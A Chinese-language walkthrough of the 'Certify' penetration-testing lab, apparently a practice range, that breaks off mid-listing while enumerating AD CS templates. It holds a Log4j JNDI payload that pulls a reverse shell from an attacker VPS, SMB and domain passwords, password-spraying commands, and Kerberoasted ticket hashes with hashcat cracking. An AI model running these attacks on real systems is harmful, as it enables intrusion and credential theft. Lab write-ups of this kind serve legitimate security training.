Certify Writeup

外网信息收集

访问后是Solr

Solr可能存在log4j2 Rce

log4j2 Rce

先起一个ldap服务

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i vpsaddress -p port

反弹shell

GET /solr/admin/collections?action=${jndi:ldap://vpsaddress:1389/Basic/ReverseShell/vpsaddress/port} HTTP/1.1
Host: 39.99.154.173:8983
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

grc提权

sudo grc

内网渗透

内网信息收集

solr@ubuntu:/tmp$ ./fscan -h  172.22.9.1/24
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.0

[2025-03-11 13:20:43] [INFO] 暴力破解线程数: 1
[2025-03-11 13:20:43] [INFO] 开始信息扫描
[2025-03-11 13:20:43] [INFO] CIDR范围: 172.22.9.0-172.22.9.255
[2025-03-11 13:20:43] [INFO] 生成IP范围: 172.22.9.0.%!d(string=172.22.9.255) - %!s(MISSING).%!d(MISSING)
[2025-03-11 13:20:43] [INFO] 解析CIDR 172.22.9.1/24 -> IP范围 172.22.9.0-172.22.9.255
[2025-03-11 13:20:43] [INFO] 最终有效主机数量: 256
[2025-03-11 13:20:43] [INFO] 开始主机扫描
[2025-03-11 13:20:43] [INFO] 正在尝试无监听ICMP探测...
[2025-03-11 13:20:43] [INFO] 当前用户权限不足,无法发送ICMP包
[2025-03-11 13:20:43] [INFO] 切换为PING方式探测...
[2025-03-11 13:20:43] [SUCCESS] 目标 172.22.9.7      存活 (ICMP)
[2025-03-11 13:20:43] [SUCCESS] 目标 172.22.9.26     存活 (ICMP)
[2025-03-11 13:20:43] [SUCCESS] 目标 172.22.9.47     存活 (ICMP)
[2025-03-11 13:20:43] [SUCCESS] 目标 172.22.9.19     存活 (ICMP)
[2025-03-11 13:20:49] [INFO] 存活主机数量: 4
[2025-03-11 13:20:49] [INFO] 有效端口数量: 233
[2025-03-11 13:20:49] [SUCCESS] 端口开放 172.22.9.19:80
[2025-03-11 13:20:49] [SUCCESS] 端口开放 172.22.9.19:22
[2025-03-11 13:20:49] [SUCCESS] 端口开放 172.22.9.26:135
[2025-03-11 13:20:49] [SUCCESS] 端口开放 172.22.9.7:135
[2025-03-11 13:20:49] [SUCCESS] 端口开放 172.22.9.47:22
[2025-03-11 13:20:49] [SUCCESS] 端口开放 172.22.9.47:21
[2025-03-11 13:20:49] [SUCCESS] 端口开放 172.22.9.47:80
[2025-03-11 13:20:49] [SUCCESS] 端口开放 172.22.9.7:88
[2025-03-11 13:20:49] [SUCCESS] 端口开放 172.22.9.47:445
[2025-03-11 13:20:49] [SUCCESS] 端口开放 172.22.9.26:445
[2025-03-11 13:20:49] [SUCCESS] 端口开放 172.22.9.7:445
[2025-03-11 13:20:49] [SUCCESS] 端口开放 172.22.9.7:389
[2025-03-11 13:20:49] [SUCCESS] 端口开放 172.22.9.26:139
[2025-03-11 13:20:49] [SUCCESS] 端口开放 172.22.9.47:139
[2025-03-11 13:20:49] [SUCCESS] 端口开放 172.22.9.7:139
[2025-03-11 13:20:49] [SUCCESS] 端口开放 172.22.9.7:80
[2025-03-11 13:20:49] [SUCCESS] 服务识别 172.22.9.19:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.5 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2025-03-11 13:20:50] [SUCCESS] 服务识别 172.22.9.47:22 => [ssh] 版本:7.6p1 Ubuntu 4ubuntu0.7 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.7.]
[2025-03-11 13:20:50] [SUCCESS] 服务识别 172.22.9.47:21 => [ftp] 版本:3.0.3 产品:vsftpd 系统:Unix Banner:[220 (vsFTPd 3.0.3).]
[2025-03-11 13:20:50] [SUCCESS] 端口开放 172.22.9.19:8983
[2025-03-11 13:20:54] [SUCCESS] 服务识别 172.22.9.19:80 => [http] 版本:1.18.0 产品:nginx 系统:Linux 信息:Ubuntu
[2025-03-11 13:20:55] [SUCCESS] 服务识别 172.22.9.7:88 => 
[2025-03-11 13:20:55] [SUCCESS] 服务识别 172.22.9.26:445 => 
[2025-03-11 13:20:55] [SUCCESS] 服务识别 172.22.9.47:80 => [http]
[2025-03-11 13:20:55] [SUCCESS] 服务识别 172.22.9.7:445 => 
[2025-03-11 13:20:55] [SUCCESS] 服务识别 172.22.9.7:389 => 
[2025-03-11 13:20:55] [SUCCESS] 服务识别 172.22.9.26:139 =>  Banner:[.]
[2025-03-11 13:20:55] [SUCCESS] 服务识别 172.22.9.7:139 =>  Banner:[.]
[2025-03-11 13:20:55] [SUCCESS] 服务识别 172.22.9.7:80 => [http]
[2025-03-11 13:21:00] [SUCCESS] 服务识别 172.22.9.19:8983 => [http] 产品:Apache Solr Banner:[HTTP/1.1 302 Found.Location: http://172.22.9.19:8983/solr/.]
[2025-03-11 13:21:50] [SUCCESS] 服务识别 172.22.9.47:445 => 
[2025-03-11 13:21:50] [SUCCESS] 服务识别 172.22.9.47:139 => 
[2025-03-11 13:21:54] [SUCCESS] 服务识别 172.22.9.26:135 => 
[2025-03-11 13:21:54] [SUCCESS] 服务识别 172.22.9.7:135 => 
[2025-03-11 13:21:55] [INFO] 存活端口数量: 17
[2025-03-11 13:21:55] [INFO] 开始漏洞扫描
[2025-03-11 13:21:55] [INFO] 加载的插件: findnet, ftp, ldap, ms17010, netbios, smb, smb2, smbghost, ssh, webpoc, webtitle
[2025-03-11 13:21:55] [SUCCESS] 网站标题 http://172.22.9.19        状态码:200 长度:612    标题:Welcome to nginx!
[2025-03-11 13:21:55] [SUCCESS] NetBios 172.22.9.7      DC:XIAORANG\XIAORANG-DC    
[2025-03-11 13:21:55] [SUCCESS] 网站标题 http://172.22.9.47        状态码:200 长度:10918  标题:Apache2 Ubuntu Default Page: It works
[2025-03-11 13:21:55] [SUCCESS] 网站标题 http://172.22.9.7         状态码:200 长度:703    标题:IIS Windows Server
[2025-03-11 13:21:55] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.9.7
主机名: XIAORANG-DC
发现的网络接口:
   IPv4地址:
      └─ 172.22.9.7
[2025-03-11 13:21:55] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.9.26
主机名: DESKTOP-CBKTVMO
发现的网络接口:
   IPv4地址:
      └─ 172.22.9.26
[2025-03-11 13:21:55] [SUCCESS] NetBios 172.22.9.26     DESKTOP-CBKTVMO.xiaorang.lab        Windows Server 2016 Datacenter 14393
[2025-03-11 13:21:55] [INFO] 系统信息 172.22.9.47 [Windows 6.1]
[2025-03-11 13:21:55] [SUCCESS] NetBios 172.22.9.47     fileserver                          Windows 6.1
[2025-03-11 13:21:55] [SUCCESS] SMB认证成功 172.22.9.47:445 administrator:123456
[2025-03-11 13:21:55] [INFO] SMB2共享信息 172.22.9.47:445 administrator Pass:123456 共享:[print$ fileshare IPC$]
[2025-03-11 13:21:55] [SUCCESS] 目标: http://172.22.9.7:80
  漏洞类型: poc-yaml-active-directory-certsrv-detect
  漏洞名称: 
  详细信息:
        author:AgeloVito
        links:https://www.cnblogs.com/EasonJim/p/6859345.html
[2025-03-11 13:21:55] [SUCCESS] 网站标题 http://172.22.9.19:8983   状态码:302 长度:0      标题:无标题 重定向地址: http://172.22.9.19:8983/solr/
[2025-03-11 13:21:56] [SUCCESS] 网站标题 http://172.22.9.19:8983/solr/ 状态码:200 长度:16555  标题:Solr Admin

SMB匿名登录

此时发现存在SMB匿名登录： SMB认证成功 172.22.9.47:445 administrator:123456

flag01

存在数据库敏感信息泄露

下载下来之后发现存在类似于：xxxx@xiaorang.lab的信息

Kerberos AS-REQ 域内用户名枚举攻击

看到 @xiaorang.lab 的结尾很容易想到可能要去枚举域内用户。

在kerberos的AS-REQ认证阶段，当cname值中的用户不存在时，返回包会提示KDC_ERR_C_PRINCIPAL_UNKNOWN。当用户名存在，密码正确和密码错误时，返回包会有所不同。所以当我们没有域凭证时，我们可以基于该差异对域用户进行用户枚举。

./kerbrute_linux_amd64 userenum --dc 172.22.9.7 -d xiaorang.lab 1.txt

此时还发现了一张密码表

密码喷洒

./kerbrute_linux_amd64 passwordspray --dc 172.22.9.7 -d xiaorang.lab user.txt i9XDE02pLVf
./kerbrute_linux_amd64 passwordspray --dc 172.22.9.7 -d xiaorang.lab user.txt 6N70jt2K9sV
./kerbrute_linux_amd64 passwordspray --dc 172.22.9.7 -d xiaorang.lab user.txt fiAzGwEMgTY

但是无法 RDP 上去，上面提示我们 SPN，那我们就找一找 SPN。

SPN:ServicePrincipal Names

SPN，ServicePrincipal Names，即服务主体名称，是服务实例（比如：HTTP、SMB、MySQL等服务）在使用 Kerberos 身份验证的网络上的唯一标识符，其由服务类、主机名和端口组成。
SPN 分为两种类型：一种是注册在活动目录的机器帐户（Computers）下。当一个服务的权限为 Local System 或 Network Service 时，则 SPN 注册在机器帐户（Computers）下。另一种是注册在活动目录的域用户帐户（Users）下，当一个服务的权限为一个域用户时，则 SPN 注册在域用户帐户（Users）下。

GetUserSPNs.py 来发现注册在指定用户下的 SPN 服务主体名称

┌──(hey㉿kali)-[~/Desktop/impacket-0.12.0/examples]
└─$ proxychains GetUserSPNs.py -dc-ip 172.22.9.7 xiaorang.lab/zhangjian:i9XDE02pLVf
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
/usr/local/bin/GetUserSPNs.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  __import__('pkg_resources').run_script('impacket==0.12.0', 'GetUserSPNs.py')
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[proxychains] Strict chain  ...  47.122.38.153:6666  ...  172.22.9.7:389  ...  OK
ServicePrincipalName                   Name      MemberOf  PasswordLastSet             LastLogon  Delegation 
-------------------------------------  --------  --------  --------------------------  ---------  ----------
TERMSERV/desktop-cbktvmo.xiaorang.lab  zhangxia            2023-07-14 12:45:45.213944  <never>               
WWW/desktop-cbktvmo.xiaorang.lab/IIS   zhangxia            2023-07-14 12:45:45.213944  <never>               
TERMSERV/win2016.xiaorang.lab          chenchen            2023-07-14 12:45:39.767035  <never>               



                                                                                                                                                                                                                                            
┌──(hey㉿kali)-[~/Desktop/impacket-0.12.0/examples]
└─$ proxychains GetUserSPNs.py -dc-ip 172.22.9.7 xiaorang.lab/zhangjian:i9XDE02pLVf -request-user chenchen
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
/usr/local/bin/GetUserSPNs.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  __import__('pkg_resources').run_script('impacket==0.12.0', 'GetUserSPNs.py')
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[proxychains] Strict chain  ...  47.122.38.153:6666  ...  172.22.9.7:389  ...  OK
ServicePrincipalName           Name      MemberOf  PasswordLastSet             LastLogon  Delegation 
-----------------------------  --------  --------  --------------------------  ---------  ----------
TERMSERV/win2016.xiaorang.lab  chenchen            2023-07-14 12:45:39.767035  <never>               



[-] CCache file is not found. Skipping...
[proxychains] Strict chain  ...  47.122.38.153:6666  ...  172.22.9.7:88  ...  OK
[proxychains] Strict chain  ...  47.122.38.153:6666  ...  172.22.9.7:88  ...  OK
[proxychains] Strict chain  ...  47.122.38.153:6666  ...  172.22.9.7:88  ...  OK
$krb5tgs$23$*chenchen$XIAORANG.LAB$xiaorang.lab/chenchen*$65c2333af3fa46c6bd1b0de8ca6ce5b4$6d1da03f247de97817473d511822253c801b5e9592ac21ebaf452d39e9c0b178285672ccb3d988f88d54cc9cd681f6d4b8f2f81873f4b036cbdf2fc845633b1e7eeb648c775e58b2c6443e663495c51b919241668ac33ac88b92edc157845b9e0a99d41bbb24587fac446b79a5abec608d65266377d4e1710276b0fcffe5bc1b33f2788006a6848f79c47074a20626c7657ad4aa2fa140ee04e6d5ce30e8e70a3a47e882cdd2c3e94ff1f6385687f4c4525ce0d9506ba02518ccc500b03a26c40047154126d9e18dfe71a470df9c7adb233268c987a0a438eb9a513b952d373e13f4bcd8d96fe7da1f35ee1203d429d59e12cdb51b304aab3b92c34aed8fc88a0ae3593fa4a259256405212339ac6da100c1b85f13fa9ee6846a47237cd3f4e716f17e07903032cc6d7aa99b0d44d08d07c484d55b4b5be16aeada476e43905126923f54b5bf4765aad5cd0ecd17458a714f7d72cc96922f5398e3023cb8a12e13012466b1f40035114588f1eff59321581e8b3de82648886f607a3502f0dba1c406cba6cb9785cf862529ff5a3c1b92fd9a2b8ee2fbd9af6bc0799d597444c740bb550f222797b25ec417b9c1a0823d2297a3eb61a7ff9d92f0a801027bf1ebae97b7e1ea3b8f4ab6c60afb34dfb0f92f286bb4ea2de25e2e5aad0662271cf8e7c11a6fceb67a47462b8de8df5f361c461e891f893feaa4698f5e470f2735eb3b32da3ac925bf29d3cc52f07399d25b70c1cb87ae5a96374ed62ca3b4b1968b9d78d8b9f8ee0333867f0b82a8c016ef3933332eccfab23826d43a93951815697a3b3b6fd93fe7fda0ebe686f1f0a03703250abb462f7007ae3e731e1762def90f20ec0539d4f3082419d1f2550bbe978a52d231c10e72a599d12422921da7ed5c6a3c289a22132f5db23a1e3a79832f026d446aae6fb40d5124fa2ee7a1ab16d8ab35f9ada1fad0c4ff75c5876df2f8f8e2f031538e53934ad5a0de18df01c76436733671c384cb710b3100eff8057f7130ef1174e2da8b9589076fd6bf2528f028dcd19e7a25347c3cd6d867a89f4a907ce084008745764019742257f114f100f2dc1ac3c797c04670bc4109bb71b56cdce894d9b681f342530f0a30c2c2ae1c3427d7c4039a108a7cdf8faea09ee574bbb6196be535ef4916dda2b2df6949badb44858d4a54f22dce4b29e4a02478c8f1354ea8969888129c0a57a981c1f046c81b0fcd4af82445f83509040254fce2f80a622e9e1390fbb1047d8fdd54cc0364c07110108b430757d7742272b72c6a7d996e80b69667820a17384f1eb42941e9cfff1600ad2f2e5b34581718d9bbc3fddff8f9b95ade59c65b7990aee2666957afe3d5cd31296db4ae1e39ebd79e303e758c06c524805ba19033423bdc8fa71589a528f2c8025893aee148160ea30c707aa1e1ed183bd5bc46f33ad0d79ad9b8d650a590076d358897504074a885821222b4dd7b2bcdb79a8cda0c50ab99a0958347ccd21b916912f8f9a61a
                                                                                                                                                                                                                                            
┌──(hey㉿kali)-[~/Desktop/impacket-0.12.0/examples]
└─$ proxychains GetUserSPNs.py -dc-ip 172.22.9.7 xiaorang.lab/zhangjian:i9XDE02pLVf

[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
/usr/local/bin/GetUserSPNs.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  __import__('pkg_resources').run_script('impacket==0.12.0', 'GetUserSPNs.py')
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[proxychains] Strict chain  ...  47.122.38.153:6666  ...  172.22.9.7:389  ...  OK
ServicePrincipalName                   Name      MemberOf  PasswordLastSet             LastLogon  Delegation 
-------------------------------------  --------  --------  --------------------------  ---------  ----------
TERMSERV/desktop-cbktvmo.xiaorang.lab  zhangxia            2023-07-14 12:45:45.213944  <never>               
WWW/desktop-cbktvmo.xiaorang.lab/IIS   zhangxia            2023-07-14 12:45:45.213944  <never>               
TERMSERV/win2016.xiaorang.lab          chenchen            2023-07-14 12:45:39.767035  <never>               



                                                                                                                                                                                                                                            
┌──(hey㉿kali)-[~/Desktop/impacket-0.12.0/examples]
└─$ proxychains GetUserSPNs.py -dc-ip 172.22.9.7 xiaorang.lab/liupeng:fiAzGwEMgTY                       
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
/usr/local/bin/GetUserSPNs.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  __import__('pkg_resources').run_script('impacket==0.12.0', 'GetUserSPNs.py')
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[proxychains] Strict chain  ...  47.122.38.153:6666  ...  172.22.9.7:389  ...  OK
ServicePrincipalName                   Name      MemberOf  PasswordLastSet             LastLogon  Delegation 
-------------------------------------  --------  --------  --------------------------  ---------  ----------
TERMSERV/desktop-cbktvmo.xiaorang.lab  zhangxia            2023-07-14 12:45:45.213944  <never>               
WWW/desktop-cbktvmo.xiaorang.lab/IIS   zhangxia            2023-07-14 12:45:45.213944  <never>               
TERMSERV/win2016.xiaorang.lab          chenchen            2023-07-14 12:45:39.767035  <never>               



                                                                                                                                                                                                                                            
┌──(hey㉿kali)-[~/Desktop/impacket-0.12.0/examples]
└─$ proxychains GetUserSPNs.py -dc-ip 172.22.9.7 xiaorang.lab/liupeng:fiAzGwEMgTY -request-user chenchen
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
/usr/local/bin/GetUserSPNs.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  __import__('pkg_resources').run_script('impacket==0.12.0', 'GetUserSPNs.py')
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[proxychains] Strict chain  ...  47.122.38.153:6666  ...  172.22.9.7:389  ...  OK
ServicePrincipalName           Name      MemberOf  PasswordLastSet             LastLogon  Delegation 
-----------------------------  --------  --------  --------------------------  ---------  ----------
TERMSERV/win2016.xiaorang.lab  chenchen            2023-07-14 12:45:39.767035  <never>               



[-] CCache file is not found. Skipping...
[proxychains] Strict chain  ...  47.122.38.153:6666  ...  172.22.9.7:88  ...  OK
[proxychains] Strict chain  ...  47.122.38.153:6666  ...  172.22.9.7:88  ...  OK
[proxychains] Strict chain  ...  47.122.38.153:6666  ...  172.22.9.7:88  ...  OK
$krb5tgs$23$*chenchen$XIAORANG.LAB$xiaorang.lab/chenchen*$72477e422a439a3804793b75737a89ae$0780a99f3632f74fe39603751c6da681950f0cbc5f7b77a7194b582f9e6e0792ab78caf24d7439ce627ee36d8ba63f8b87f5246acbc7e08a2fdf8b3e9072c24869bd2d127693c0ceff14d2b9cc5299e8b8a7a111b4d546521fb956e3cc6142d2ddd5714e599891bf9dfc7af9d171ba4cab2c3118bea02ad73c20c3eac1078df656595174d0b2fe25ec88890d5a7720f3b3b5d0184057fb79835a3fd2cc90af2d4241965da7585a888630ae7a0939472f84f5d18dcb4b9bf0631efc17f5b135727112f3e9948e975d466db5cd59ddf49953f4158e35b64e52db8c3e3d30094850cf0b8d261806e921bcf0d98ca390671994d063608ea503cd3746fa909c9c1196f8680c0d0067cb782ff89959b5b98555abb913543ddf1b301e54bb4c85dead160db2dce0035713d1cff812d51437e8759e7e14bd968f0cccb2b34d7a58b7b8cc8b3ae8c84387e2193791c971fc0da5fb80f328feb6e6c334230e6355e233a4e4245bffabe388c3e78e5203ad8ba2671f788461f0eb13927560cba015a2cb7ab19ad55b248503fbd7e35464ab7116a7e24ab48ad0138cc74e278dd3d97f33aab46f21b47e8af9016040207fad5b5dc6b3de08ddbb3b4501924823d07ac4ccbf2a52501b3e6874681556171f5316e88526189039e91ceca92840c8099a37e728b0da2909296787433eac46c0feda03b25aeabfb29244f7abde60188a3b647f30f1bfc928dc1383024c0fa509ab2621003744ca9fb3174de8e6bbb6eb71ba74de90162ba078ed1dcc5c020869bbc3b731cf9742ce6ade3768abed3b1413287e4b8c91051e9576f46412f33a936f1599b17c3fe5054dd3c7a9865b5f68684d124fc822900f758791b203b9695cd585ca6bba93cce79fcb39f28c607ebcf47058d86d20f7261a7dee843c8a8f31c6ab39a09b96933b1e0573fbee75d80c2f3671f804a2ac149ad6c4606c05a902f4091eaa5edf26202b87fc303091500a3a98ff7e0eca60473b548584f25f596bf87367cbcd4ac09a8d31d825c690243e4c27e1b5ea0c55324e69c5e7b40882c51ad595ae2338c8f1c52e08a975e740729b880f256280db0671b8520881aa1131f80b239734b4989dfcb4b21e194705265ee988306733dfaefbde57c0cf7b3f50a95b78fad7197b9041d78e76da2aa5cf925a7b0e7ab9c0e848d308726d48183dcd3b0d96511711950de3bf2060f88f4dee0799ff6ff040e96997299edaf9f00b863f51348094dea79a2b8ccb08292863267b7cf9e0286896e2d8ca1925298f9ad06ed55c3d7fd9591b063ee00e0830ecf6ce171ea73b4d9677200454a3a8a6057e4f0457d96673934da20cbb69bf025c2f69abf411f72aba42e91b4be2cd9d5fef5ab2989781e5c7ba75b969d3b247a2fd24d2bec1a0891d2c0d344fb6d6f7f015348cf86b1f41b40917ab9ee704c1dd03a15405f5470cfb2e16611c8bea2adf52

请求ST票据

proxychains GetUserSPNs.py -dc-ip 172.22.9.7 xiaorang.lab/zhangjian:i9XDE02pLVf
proxychains GetUserSPNs.py -dc-ip 172.22.9.7 xiaorang.lab/zhangjian:i9XDE02pLVf -request-user chenchen

hash爆破

hashcat -m 13100 -a 0 '/home/hey/Desktop/2.txt' '/home/hey/Desktop/rockyou.txt' --force

Rdp

域渗透

域内信息收集

在先前的内网信息收集中我们已经知道172.22.9.26这台机器存在active-directory-certsrv-detect；也就是ADCS：

ADCS：Active Directory Certificate Services（活动目录证书服务）。ADCS 是 Windows Server 中的一个角色，用于建立和管理公钥基础设施（PKI）。PKI 是一种用于创建、管理、分发、存储和撤销数字证书的体系结构。ADCS 允许组织在其网络中实现安全通信，通过颁发和管理数字证书来确保数据传输的机密性、完整性和身份验证。

AD CS

proxychains certipy find -u 'zhangxia@xiaorang.lab'  -password 'MyPass2@@6' -dc-ip 172.22.9.7 -vulnerable -stdout

C:\Users\chenchen\Desktop\hvv>Certify.exe find -u 'liupeng@xiaorang.lab'  -password 'fiAzGwEMgTY' -dc-ip 172.22.9.7 -vulnerable -stdout

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.0.0

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=xiaorang,DC=lab'

[*] Listing info about the Enterprise CA 'xiaorang-XIAORANG-DC-CA'

    Enterprise CA Name            : xiaorang-XIAORANG-DC-CA
    DNS Hostname                  : XIAORANG-DC.xiaorang.lab
    FullName                      : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=xiaorang-XIAORANG-DC-CA, DC=xiaorang, DC=lab
    Cert Thumbprint               : 37BFD9FE73CA81E18E7A87CEBD90AF267E57170E
    Cert Serial                   : 43A73F4A37050EAA4E29C0D95BC84BB5
    Cert Start Date               : 2023/7/14 12:33:21
    Cert End Date                 : 2028/7/14 12:43:21
    Cert Chain                    : CN=xiaorang-XIAORANG-DC-CA,DC=xiaorang,DC=lab
    UserSpecifiedSAN              : Disabled
    CA Permissions                :
      Owner: BUILTIN\Administrators        S-1-5-32-544

      Access Rights                                     Principal

      Allow  Enroll                                     NT AUTHORITY\Authenticated UsersS-1-5-11
      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544
      Allow  ManageCA, ManageCertificates               XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
      Allow  ManageCA, ManageCertificates               XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
    Enrollment Agent Restrictions : None

[*] Available Certificates Templates :

    CA Name                               : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
    Template Name                         : User
    Schema Version                        : 1
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : 安全电子邮件, 加密文件系统, 客户端身份验证
    mspki-certificate-application-policy  : <null>
    Permissions
      Enrollment Permissions
        Enrollment Rights           : XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Domain Users         S-1-5-21-990187620-235975882-534697781-513
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
      Object Control Permissions
        Owner                       : XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
        WriteOwner Principals       : XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
        WriteDacl Principals        : XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
        WriteProperty Principals    : XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519

    CA Name                               : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
    Template Name                         : EFS
    Schema Version                        : 1
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : 加密文件系统
    mspki-certificate-application-policy  : <null>
    Permissions
      Enrollment Permissions
        Enrollment Rights           : XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Domain Users         S-1-5-21-990187620-235975882-534697781-513
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
      Object Control Permissions
        Owner                       : XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
        WriteOwner Principals       : XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
        WriteDacl Principals        : XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
        WriteProperty Principals    : XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519

    CA Name                               : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
    Template Name                         : Administrator
    Schema Version                        : 1
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Microsoft 信任列表签名, 安全电子邮件, 加密文件系统, 客户端身份验证
    mspki-certificate-application-policy  : <null>
    Permissions
      Enrollment Permissions
        Enrollment Rights           : XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
      Object Control Permissions
        Owner                       : XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
        WriteOwner Principals       : XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
        WriteDacl Principals        : XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
        WriteProperty Principals    : XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519

    CA Name                               : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
    Template Name                         : EFSRecovery
    Schema Version                        : 1
    Validity Period                       : 5 years
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
